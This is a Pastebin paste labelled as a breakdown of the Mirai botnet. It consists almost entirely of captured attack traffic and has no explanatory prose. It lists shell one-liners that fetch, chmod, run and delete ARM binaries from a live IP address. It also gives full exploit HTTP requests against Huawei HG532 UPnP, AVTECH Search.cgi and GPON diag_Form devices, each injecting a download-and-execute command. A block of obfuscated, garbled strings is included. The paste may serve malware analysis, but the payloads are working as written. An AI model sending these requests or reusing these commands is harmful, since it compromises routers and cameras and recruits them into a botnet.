Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BREAK DOWN OF THE MIRAI BotNet:
- -- Oct 31st, 2018
- cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm7 -O d4rka; chmod 777 d4rka; ./d4rka avtech; rm -rf d4rka
- cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb avtech; rm -rf d4rkb
- cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm7 -O d4rka; chmod 777 d4rka; ./d4rka gpon_armv7l; rm -rf d4rka
- cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb gpon_armv4l; rm -rf d4rkb
- POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
- Content-Length: 430
- Connection: keep-alive
- Accept: */*
- Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
- <?xml version="1.0"?>
- <s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">
- <s:Body>
- <u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
- <NewStatusURL>$(/bin/busybox wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei; /bin/busybox chmod 777 * /tmp/ankitxd; /tmp/ankitxd huawei)</NewStatusURL>
- <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
- </u:Upgrade>
- </s:Body>
- </s:Envelope>
- hxxp://209.141.33.119/avtechsh
- hxxp://209.141.33.119/gponsh
- huagoagpoGET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
- User-Agent: Dark
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: close
- GET / HTTP/1.1POST /GponForm/diag_Form?images/ HTTP/1.1
- User-Agent: Dark
- Accept: */*
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded
- XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://209.141.33.119/gponsh+-O+/tmp/d4rk;sh+/tmp/d4rk`&ipv=0gjg*`evomkp*jap tvk|}tmta*gki+tvkg++a|a+b`+wpepqw+tvkg+jap+pgtwlahhajefhaw}wpaiwlfelwpevphmjq|wlahh+fmj+fqw}fk|$@EVO@EVO>$etthap$jkp$bkqj`jgkvvagpkcmjewwskv`ajpav+`ar+sepgl`kc+`ar+imwg+sepgl`kc+wfmj+sepgl`kc+fmj+sepgl`kc+`ar+BPS@P545[sepgl`kc+`ar+BPS@P545+sepgl`kc+`ar+sepgl`kc4+apg+`abeqhp+sepgl`kc+apg+sepgl`kc@EVO`kcapg?/dev/null
- ########
- #SHELL:#
- ########
- wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei;
- /bin/busybox chmod 777 * /tmp/ankitxd;
- /tmp/ankitxd huawei)
- </NewStatusURL>
- <NewDownloadURL>
- $(echo HUAWEIUPNP)
- </NewDownloadURL>
- </u:Upgrade>
- </s:Body>
- </s:Envelope>
- ########
- #:HTTP:#
- ########
- GET / HTTP/1.1
- GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
- POST /GponForm/diag_Form?images/ HTTP/1.1
- POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
- User-Agent: Dark
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement